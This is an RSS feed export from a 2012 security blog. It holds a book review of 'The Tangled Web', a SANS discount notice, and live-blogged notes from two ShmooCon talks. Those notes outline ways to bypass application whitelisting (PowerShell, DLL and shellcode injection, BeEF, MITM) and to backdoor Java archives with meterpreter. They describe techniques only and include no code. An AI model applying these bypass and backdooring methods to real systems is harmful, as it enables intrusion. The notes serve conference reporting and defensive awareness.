<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Cатсн²² (in)sесuяitу / ChrisJohnRiley &#187; Security</title>
	<atom:link href="http://blog.c22.cc/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.c22.cc</link>
	<description>Because we&#039;re damned if we do, and we&#039;re damned if we don&#039;t!</description>
	<lastBuildDate>Fri, 03 Feb 2012 13:33:46 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.c22.cc' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/1b6c05a022094e3a7342e6b645c9cfce?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Cатсн²² (in)sесuяitу / ChrisJohnRiley &#187; Security</title>
		<link>http://blog.c22.cc</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.c22.cc/osd.xml" title="Cатсн²² (in)sесuяitу / ChrisJohnRiley" />
	<atom:link rel='hub' href='http://blog.c22.cc/?pushpress=hub'/>
		<item>
		<title>{book review} The Tangled Web</title>
		<link>http://blog.c22.cc/2012/02/03/book-review-the-tangled-web/</link>
		<comments>http://blog.c22.cc/2012/02/03/book-review-the-tangled-web/#comments</comments>
		<pubDate>Fri, 03 Feb 2012 13:30:32 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[nostarch]]></category>
		<category><![CDATA[tangled web]]></category>
		<category><![CDATA[Zalewski]]></category>

		<guid isPermaLink="false">https://c22blog.wordpress.com/?p=3672</guid>
		<description><![CDATA[It&#8217;s been 6 years since Michal Zalewski&#8217;s &#8220;Silence on the wire&#8221; hit the shelves. Although &#8220;The Tangled Web&#8221; concentrates on a completely separate set of issues, you can&#8217;t fail but draw comparison between the two books. Zalewski&#8217;s unique style of writing brings both topics to life, not simply scratching the surface of a set topic, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3672&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://nostarch.com/tangledweb.htm"><img class="size-medium wp-image-3835 alignright" style="margin:8px;" title="tangledWeb_cvr-webquality" src="http://c22blog.files.wordpress.com/2011/12/tangledweb_cvr-webquality.png?w=226&#038;h=300" alt="" width="226" height="300" /></a>It&#8217;s been 6 years since Michal Zalewski&#8217;s &#8220;<a href="http://nostarch.com/silence.htm" target="_blank">Silence on the wire</a>&#8221; hit the shelves. Although &#8220;The Tangled Web&#8221; concentrates on a completely separate set of issues, you can&#8217;t fail but draw comparison between the two books. Zalewski&#8217;s unique style of writing brings both topics to life, not simply scratching the surface of a set topic, but diving headlong into the lowest levels to give the reader a true understanding of the reasons why, and the thought processes behind, any feature, bug, or technology discussed. The Tangled Web does for Web Applications what silence on the wire did for computers and networks.</p>
<p>The Tangled Web is split into 3 parts, starting off with a concise walk-through of the underlying technologies of the web. Unlike so many other books that take for granted that the reader is already up to par on the backstory, Zalewski takes the time to really dig deep into the tools, protocols and RFCs that run the modern web.</p>
<h3 style="padding-left:30px;">Part 1: Anatomy of the web</h3>
<ul>
<ul>
<li>It starts with a URL</li>
<li>Hypertext Transfer Protocol</li>
<li>Hypertext Markup Language</li>
<li>Cascading Style Sheets</li>
<li>Browser Side Scripts</li>
<li>Non-HTML Document Types</li>
<li>Content Rendering with Browser plug-ins</li>
</ul>
</ul>
<p>This not always pretty romp through an alphabet soup of acronyms gives the reader the knowledge need to not only understand and appreciate the 2nd part of the book as it should be, but is in my mind the single best source for anybody looking to really understand the web as it works today. Not the way you think it  works, the way it should work, or the way the RFCs say it needs to work, but the down and dirty truth behind the web. Nothing is what it seems, and when you place the safety of your computer in the hands of browser vendors, you&#8217;re not quite sure what you&#8217;re going to get it seems.</p>
<p>Part 2 of the book moves from understanding the web to understanding how browsers see and interpret the web, and how the browser security models really work. You&#8217;d think every browser would see things and handle things the same, but after even the first few pages you get the feeling that no 2 browsers are going to handle things the way you expect, or want!</p>
<h3 style="padding-left:30px;">Part 2: Browser Security Features</h3>
<ul>
<ul>
<li>Content Isolation Logic</li>
<li>Origin Inheritance</li>
<li>Life Outside Same-Origin Rules</li>
<li>Other Security Boundaries</li>
<li>Content Recognition Mechanisms</li>
<li>Dealing With Rogue Scripts</li>
<li>Extrinsic Site Privileges</li>
</ul>
</ul>
<p>Zalewski covers the very fundamentals the current generation of browsers use to protect users in a way that just seems to make things click. Even when discussing things like same-origin policy and how the different browsers interpret the rules, the information just seems to make sense without needing to re-read sections over and over (<em>an issue I had with some of the &#8220;silence on the wire&#8221; content at times</em>). A common theme that comes up in part 2 of the book is the &#8220;sins of the old&#8221;, were browsers are suffering from security issues due to lack of foresight. As more and more bandaids are stuck into the browser security models, things become ever complex. It&#8217;s sad to see however that companies still aren&#8217;t learning from this lack of foresight as issues crop up again and again (<em>for example &lt;canvas&gt; loading of cross-domain images. An issue that&#8217;s since been resolved</em>).</p>
<blockquote><p>Those who cannot remember the past are condemned to repeat it. (<em>George Santayana)</em></p></blockquote>
<p style="text-align:left;"><em></em>The chapter discussing &#8220;Content Recognition Mechanisms could easily be renamed to &#8220;101 reasons to always set a charset&#8221;. The sniffing logic of browsers is both scary and often abused. What struck me more than the scary quirks of certain browsers was that most people just aren&#8217;t aware of these issues&#8230; I know I wasn&#8217;t!</p>
<p style="text-align:left;">Moving into part 3 of the book, Zalewski talks about what&#8217;s to come in terms of browser advancements.</p>
<h3 style="padding-left:30px;">Part 3: A Glimpe Of Things To Come</h3>
<ul>
<ul>
<li>New And Upcoming Security Features</li>
<li>Other Browser Mechanisms Of Note</li>
<li>Common Web Vulnerabilities</li>
</ul>
</ul>
<p>Despite what the first 2 chapters of the tangled web bring to light, it doesn&#8217;t seem that browser vendors have learnt the lesson from history. New features seem to once again be applied unevenly across browsers, with Microsoft going their own route with things like xDomainRequest. Not to be left out in the cold, Mozilla&#8217;s drive for CSP is discussed in-depth along with other restriction frameworks. There&#8217;s a lot of ideas in this space it seems, but little consensus on how or what to implement.</p>
<h2>Conclusions</h2>
<p>I love this book&#8230; there&#8217;s no other way to say it. Every once in a while you get a book that&#8217;s well written, contains good content and sparks those little ideas in the back of your brain. For me, the tangled web met all of these points and then some. A book that gives you so much background on the how and the why of things, that you come out the other end really feeling like you know the subject matter.</p>
<p>That said, I&#8217;m not 100% sure who this book is targeted at&#8230; the addition of the &#8220;security engineering cheat sheets&#8221; at the end of each chapter is a great idea, and for a defender it provides some really good information. How ever I&#8217;m not sure I know many defenders that would pick this book up and give it the time it really deserves. Maybe I&#8217;m wrong on this, and I hope I am.</p>
<p>I also <del>don&#8217;t</del> didn&#8217;t see it being something the attacker types would be jumping all over themselves to read either. It&#8217;s not full of the usual hacking tips, tricks and tools you&#8217;ve come to expect from hacker books in the last few years. The information is more than that I find, but it needs to be applied to other ideas to be really useful. Still from a discussion with No Starch at Shmoocon, they sold out of the tangled web, so I hope I&#8217;m wrong on this too.</p>
<p>TL:DR; Read this book&#8230; give it your full attention, and come out the other end smarter for it!</p>
<br /> Tagged: <a href='http://blog.c22.cc/tag/nostarch/'>nostarch</a>, <a href='http://blog.c22.cc/tag/tangled-web/'>tangled web</a>, <a href='http://blog.c22.cc/tag/zalewski/'>Zalewski</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3672/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3672/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3672/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3672/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3672/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3672/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3672/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3672/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3672&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/02/03/book-review-the-tangled-web/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2011/12/tangledweb_cvr-webquality.png?w=226" medium="image">
			<media:title type="html">tangledWeb_cvr-webquality</media:title>
		</media:content>
	</item>
		<item>
		<title>ShmooCon 2012: Raising The White Flag</title>
		<link>http://blog.c22.cc/2012/01/28/shmoocon-2012-raising-the-white-flag/</link>
		<comments>http://blog.c22.cc/2012/01/28/shmoocon-2012-raising-the-white-flag/#comments</comments>
		<pubDate>Sat, 28 Jan 2012 17:47:30 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Shmoocon]]></category>
		<category><![CDATA[whitelisting]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3812</guid>
		<description><![CDATA[Raising The White Flag :: Bypassing Application White Listing – Curt Shaffer and Chris Cuevas More and more people are seeing application whitelisting in their environments. Despite what marketing people say, these solutions don&#8217;t stop APT and other advanced threats. This talk is designed to shine a light on the issues with whitelisting. Whitelisting is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3812&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><img class="aligncenter  wp-image-3806" title="ShmooCon2012" src="http://c22blog.files.wordpress.com/2012/01/shmoocon2012.png?w=500&#038;h=141" alt="" width="500" height="141" /></p>
<h1 style="text-align:left;">Raising The White Flag</h1>
<h2 style="text-align:left;">:: Bypassing Application White Listing</h2>
<p style="text-align:right;">– Curt Shaffer and Chris Cuevas</p>
<p style="text-align:left;">More and more people are seeing application whitelisting in their environments. Despite what marketing people say, these solutions don&#8217;t stop APT and other advanced threats. This talk is designed to shine a light on the issues with whitelisting.</p>
<p style="text-align:left;">Whitelisting is often touted as a replacement for AV. Despite the fact that something better than AV is needed, application whitelisting isn&#8217;t the solution. Their purpose seems good, for the execution is lacking. Things are headed in the right direction, but using simple bypass techniques it&#8217;s possible to bypass these whitelisting protections.</p>
<p style="text-align:left;">The following application whitelisting tools were tested.</p>
<ul>
<li>Bit9 Parity 6.0.0</li>
<li>McAfee Application Protection</li>
<li>Microsoft Applocker</li>
</ul>
<h3>Methodology</h3>
<div>
<ul>
<li>Windows File Protection</li>
<li>File Naming Fun</li>
<li>Iexpress packagng</li>
<li>Java Exploits/Malware</li>
<li>Flash Exploits/Malware</li>
<li>Adobe Exploits/Malware</li>
<li>JavaScript</li>
<li>VBA</li>
<li>Raw Shellcode</li>
<li>Powershell</li>
</ul>
</div>
<div>Some other things were excluded due to time constraints (including HTML5, CD-ROM ISO masquerading, Digitally Signed Malware).</div>
<div></div>
<h3>Bypassing Techniques Attempted</h3>
<ul>
<li>ActiveX</li>
<li>PDF attacks
<ul>
<li>Spawning shell</li>
</ul>
</li>
<li>Office documents
<ul>
<li>VBscript Macros</li>
</ul>
</li>
<li>Shellcodexec
<ul>
<li>Inject shellcode into memory</li>
</ul>
</li>
<li>JAVA
<ul>
<li>Applet</li>
<li>Exploit</li>
</ul>
</li>
<li>JavaScript
<ul>
<li>BeEF hook</li>
<li>Firefox Extension</li>
</ul>
</li>
<li>Powershell
<ul>
<li>Run script by piping into powershell.exe</li>
<li>DLL Injection</li>
<li>Shellcode injection</li>
<li>Chrome Extension</li>
</ul>
</li>
<li>Man-in-the-Middle
<ul>
<li>Sniff, modify, replay</li>
</ul>
</li>
</ul>
<div>This is all know. We&#8217;ve been pissing on AV for a long time. Time to piss on whitelisting as well.</div>
<div></div>
<h2>Results</h2>
<h3>McAfee</h3>
<p>Most things worked, except Windows File Protection and Iexpress.</p>
<h3>Bit9</h3>
<p>Inconsistent results with Windows File Protection, and again Iexpress failed. However everything else works.</p>
<h2>What Worked</h2>
<h3>JavaScript</h3>
<p>Injecting BeEF into a browser process</p>
<h3>Windows Help Files</h3>
<p>Compiled HTML, but needs a degree of social engineering to get people to click</p>
<p>Can run cmd.exe and game over</p>
<h3>Office Documents</h3>
<p>Lots of work in this area by Didier Stevens</p>
<h3>Powershell</h3>
<p>Powershell code injection into any 32bit or 64 bit</p>
<p>Powershell syringe</p>
<h3>Man-in-theMiddle</h3>
<p>Get between the client and server</p>
<p>ARP spoof, iptables redirect</p>
<p>It&#8217;s HTTPS, but it doesn&#8217;t check the cert</p>
<p>Enables you to drop level from enforce blocks to only alert</p>
<h3>Self protection</h3>
<p>Abilty to inject code into the actual whitelisting exe (in this case parity.exe of Bit9)</p>
<p>Bit9 deny this is an issue.</p>
<p style="text-align:center;"><em>[ demo of shellcode exection within the Bit9 Notifier process ]</em></p>
<p style="text-align:left;">Metasploit module for this will be released to demo this.</p>
<h2>Stopping this attack</h2>
<p>To protect this on Bit9, go to the admin control panel and add memory rules to protect the notifier.exe process. The memory protection menu is only available in versions above 6.0.1.</p>
<p style="text-align:left;"><img class="aligncenter size-full wp-image-3826" title="speedblogging" src="http://c22blog.files.wordpress.com/2012/01/speedblogging1.png?w=630" alt=""   /></p>
<p style="text-align:left;"><strong>Links</strong>:</p>
<ul>
<li>Talk abstract &#8211;&gt; <a href="http://www.shmoocon.org/speakers#raising" target="_blank">HERE</a></li>
</ul>
<br /> Tagged: <a href='http://blog.c22.cc/tag/shmoocon/'>Shmoocon</a>, <a href='http://blog.c22.cc/tag/whitelisting/'>whitelisting</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3812/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3812/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3812/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3812/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3812/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3812/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3812/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3812/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3812&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/28/shmoocon-2012-raising-the-white-flag/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/shmoocon2012.png?w=500" medium="image">
			<media:title type="html">ShmooCon2012</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/speedblogging1.png" medium="image">
			<media:title type="html">speedblogging</media:title>
		</media:content>
	</item>
		<item>
		<title>ShmooCon 2012: Java backdoors and Cross Framework Abuse</title>
		<link>http://blog.c22.cc/2012/01/28/shmoocon-2012-java-backdoors-and-cross-framework-abuse/</link>
		<comments>http://blog.c22.cc/2012/01/28/shmoocon-2012-java-backdoors-and-cross-framework-abuse/#comments</comments>
		<pubDate>Sat, 28 Jan 2012 16:42:13 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[frameworks]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[Shmoocon]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3805</guid>
		<description><![CDATA[Java backdoors and Cross Framework Abuse &#8211; Nicholas (aricon) Berthaume Adding backdoor(s) Java has a number of different archive formats. This talk covers the J2SE / J2EE type archives. The goal here is to show how simple it is to add potentially malicious software to three of the most common format. JAR &#8211; Java ARchive [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3805&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><img class="aligncenter  wp-image-3806" title="ShmooCon2012" src="http://c22blog.files.wordpress.com/2012/01/shmoocon2012.png?w=500&#038;h=141" alt="" width="500" height="141" /></p>
<h1 style="text-align:left;"><strong>Java backdoors and Cross Framework Abuse</strong></h1>
<p style="text-align:right;"><strong></strong> &#8211; Nicholas (aricon) Berthaume</p>
<h2 style="text-align:left;">Adding backdoor(s)</h2>
<p style="text-align:left;">Java has a number of different archive formats. This talk covers the J2SE / J2EE type archives. The goal here is to show how simple it is to add potentially malicious software to three of the most common format.</p>
<h3 style="text-align:left;">JAR &#8211; Java ARchive</h3>
<p style="text-align:left;">Typical run in Java Virtual Machines on client system</p>
<p style="text-align:left;">ZIP files with manifests, metadata and Java byte-code</p>
<p style="text-align:left;">Can be digitally signed</p>
<h3 style="text-align:left;">WARs &#8211; Web application Archives</h3>
<p style="text-align:left;">Typical run on Java application servers such as Tomcat</p>
<p style="text-align:left;">Run as the remote server user.</p>
<p style="text-align:left;">Can be digitally signed</p>
<h3 style="text-align:left;">EAR &#8211; Enterprise application ARchive</h3>
<p style="text-align:left;">Very similar to WAR, but with extended enterprise features.</p>
<p style="text-align:left;">All three file formats when allowed to run can create sockets, interact with the filesystem outside of the respective virtual machines and execute commands there. This makes then perfectly suited for exploitation.</p>
<p style="text-align:left;">Run typical with full permissions of the user and display very few warnings. At most you receive a &#8220;run or don&#8217;t run&#8221; style prompt. Signing, even with a self-signed certificate, reduces these warnings.</p>
<p style="text-align:left;">AV engines rarely do effective heuristic analysis on known malicious code when it&#8217;s inserted into a Java Archive format.</p>
<h3 style="text-align:left;">JAR backdoor payloads</h3>
<p style="text-align:left;">File droppers that execute arbitrary code.</p>
<h3 style="text-align:left;">WAR backdoor payloads</h3>
<p style="text-align:left;">Completely malicious additions to existing WAR files content, JavaScript and so on.</p>
<p style="text-align:left;">All of the same features of JAR files, but run on the remote server.</p>
<h3 style="text-align:left;">EAR backdoor payloads</h3>
<p style="text-align:left;">Similar abuse to WAR, but also allow for greater reuse of classes and scaling across multiple servers and additional security roles.</p>
<p style="text-align:left;">Adding content to WAR files is often as simple as editing the manifest and adding the required backdoor code. EAR is however a little more complex due to the additional features. However it&#8217;s possible to set the security context used to run your backdoor code.</p>
<p style="text-align:left;">JAR is more complex however. The process involves extracting a JAR to use as the host, add files into the correct paths and edit the MANIFEST as required.</p>
<h3 style="text-align:left;">Enter RAWJAR</h3>
<p style="text-align:left;">Tool designed to automate this functionality. Written in Python.</p>
<p style="text-align:left;">When combined with the JDK, this tools will give you the ability to add arbitrary Java to existing files.</p>
<p style="text-align:left;">Currently tested with EAR, WAR, JAR files using the JAVA meterpreter as the standard backdoor. However other can be used with minor modifications.</p>
<p style="text-align:left;">Due to the way code is run, closing the browser after infection leaves the code active on the system.</p>
<h3 style="text-align:left;"></h3>
<h2>Cross-framework Injection</h2>
<p>In additions to pure Java there are a number of extension APIs that are either included or installable.</p>
<h3>Java Native Access (JNA)</h3>
<p style="text-align:left;">Open-source utility for calling native and managed libraries/assemblies on nearly every platform that the JVM runs on.</p>
<h3 style="text-align:left;">.NET from the JNA</h3>
<p style="text-align:left;">By using assembled code in .NET (using jython) it was possible to implement simple calls outside the framework without needing to recompile the classes due to the reasonable support found in the JNA.</p>
<p style="text-align:left;">From here the goal is to inject processes, hopefully using standard injection techniques to inject into .NET or inject a DLL into memory.</p>
<p style="text-align:left;"><img class="aligncenter size-full wp-image-3822" title="speedblogging" src="http://c22blog.files.wordpress.com/2012/01/speedblogging1.png?w=630" alt=""   /></p>
<p style="text-align:left;"><strong>Links</strong>:</p>
<ul>
<li>Talk abstract &#8211;&gt; <a href="http://www.shmoocon.org/speakers#java" target="_blank">HERE</a></li>
<li>RAWJAR project &#8211;&gt; <a href="https://github.com/nBerthaume" target="_blank">HERE</a></li>
</ul>
<br /> Tagged: <a href='http://blog.c22.cc/tag/frameworks/'>frameworks</a>, <a href='http://blog.c22.cc/tag/java/'>java</a>, <a href='http://blog.c22.cc/tag/shmoocon/'>Shmoocon</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3805/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3805/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3805/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3805/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3805/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3805/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3805/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3805/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3805&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/28/shmoocon-2012-java-backdoors-and-cross-framework-abuse/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/shmoocon2012.png?w=500" medium="image">
			<media:title type="html">ShmooCon2012</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2012/01/speedblogging1.png" medium="image">
			<media:title type="html">speedblogging</media:title>
		</media:content>
	</item>
		<item>
		<title>SANS Germany 2012</title>
		<link>http://blog.c22.cc/2012/01/24/sans-germany-2012/</link>
		<comments>http://blog.c22.cc/2012/01/24/sans-germany-2012/#comments</comments>
		<pubDate>Tue, 24 Jan 2012 18:00:17 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SANS]]></category>

		<guid isPermaLink="false">http://blog.c22.cc/?p=3789</guid>
		<description><![CDATA[So a little birdie told me that the fine folks over at SANS are arranging a conference in Germany this year. Unfortunately I can&#8217;t get the time off to attend, but I managed to wrangle a discount code incase any of you fine reader types are thinking of attending&#8230; SANS Germany 2012 SANS Germany 2012 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3789&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img class="alignright  wp-image-3356" style="margin:7px;" title="SANS_Logo_REV" src="http://c22blog.files.wordpress.com/2011/10/sans_logo_rev.jpg?w=210&#038;h=125" alt="" width="210" height="125" />So a little birdie told me that the fine folks over at SANS are arranging a conference in Germany this year. Unfortunately I can&#8217;t get the time off to attend, but I managed to wrangle a discount code incase any of you fine reader types are thinking of attending&#8230;</p>
<blockquote><p><strong>SANS Germany 2012</strong><br />
SANS Germany 2012 is coming up soon on 5-10 March at the Arcotel Camino in Stuttgart. This will be the first SANS training conference in the country since 2008. SANS is bringing some of its biggest classes back to Europe by popular demand.</p>
<p><strong>SEC504</strong>: Hacker Techniques, Exploits and Incident Handling<br />
<strong>MGT512</strong>: SANS Security Leadership Essentials for Managers with Knowledge Compression<br />
<strong>DEV522</strong>: Defending Web Applications Security Essentials</p></blockquote>
<p>So if you&#8217;re thinking of attending, the discount code &#8220;<strong>SANS5DE12</strong>&#8221; should be good for 5% off the cost of the course. Enjoy!</p>
<p>Links:</p>
<ul>
<li><a href="http://www.sans.org/germany-2012/" target="_blank">SANS Germany 2012</a></li>
</ul>
<br /> Tagged: <a href='http://blog.c22.cc/tag/sans/'>SANS</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/c22blog.wordpress.com/3789/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/c22blog.wordpress.com/3789/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/c22blog.wordpress.com/3789/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/c22blog.wordpress.com/3789/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/c22blog.wordpress.com/3789/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/c22blog.wordpress.com/3789/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/c22blog.wordpress.com/3789/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/c22blog.wordpress.com/3789/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.c22.cc&amp;blog=1599597&amp;post=3789&amp;subd=c22blog&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.c22.cc/2012/01/24/sans-germany-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ChrisJohnRiley</media:title>
		</media:content>

		<media:content url="http://c22blog.files.wordpress.com/2011/10/sans_logo_rev.jpg?w=300" medium="image">
			<media:title type="html">SANS_Logo_REV</media:title>
		</media:content>
	</item>
		<item>
		<title>Eurotrashsec&#8230; the year that was!</title>
		<link>http://blog.c22.cc/2012/01/19/eurotrashsec-the-year-that-was/</link>
		<comments>http://blog.c22.cc/2012/01/19/eurotrashsec-the-year-that-was/#comments</comments>
		<pubDate>Thu, 19 Jan 2012 13:00:44 +0000</pubDate>
		<dc:creator>ChrisJohnRiley</dc:creator>
				<category><![CDATA[podcast]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Eurotrashsec]]></category>
		<category><![CDATA[stats]]></category>

